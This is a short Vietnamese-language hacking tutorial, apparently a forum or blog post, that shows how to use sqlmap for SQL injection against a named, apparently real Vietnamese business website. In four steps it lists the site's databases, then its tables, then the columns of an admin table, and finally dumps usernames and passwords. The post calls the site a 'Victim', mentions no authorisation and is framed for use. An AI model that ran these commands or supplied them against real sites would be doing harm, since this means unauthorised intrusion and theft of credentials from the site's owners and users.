Dụng cụ :
– Python + Sqlmap.py
– Victim !!!
Khởi động nhé !!!
– sqlmap.py -h ( hoặc –help nhé !! ) để vào cửa sổ console nhé !
Bắt đầu nhé !
– Bước 1 : Chúng ta sẽ check database
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 –dbs
u = đường dẫn url
dbs = Liệt kê databases
và nó sẽ ra như thế này : ví dụ :
+ Theo hình ở trên thì cái dbs là ” unecuae_unec ” nhé !!! còn cái information_schema thì kệ nó đi khi gặp nó nhé !!!
– Bước 2 : Tiếp theo sẽ check tables của site nhé !!!
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec –tables
-D = DBMS liệt kê dữ liệu
–tables = liệt kê cái gì thì các bạn tự tìm hiểu hén…..
và nó sẽ ra như thế này : ví dụ :
Sau khi tìm thấy một cái bảng liệt kê ” tables ” chúng ta tiếp tục dụng lệnh để tìm ra admin của site nhé !!!
– Bước 3 : Tiếp theo sẽ check columns của tables nhé !!! ( nhìn trên bảng chúng ta kiếm mấy cái liên quan đến tài khoản nhé !!! và ở đây là admin )
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec -T admin –columns
-T = DBMS lệnh lệt kê dữ liệu
–columns = liệt kê cái gì thì các bạn tự tìm hiểu hén…..
Ở đây các bạn sẽ check được column của tables ” admin nhé !!! giờ dùng lệnh típ để show hàng hoy !!
– Bước 4 : Bước cuối cùng nhé , giờ mình sẽ show hàng ra nka !!!
+ Lệnh : sqlmap -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec -T user -C user_username,user_password –dump
Kết thúc
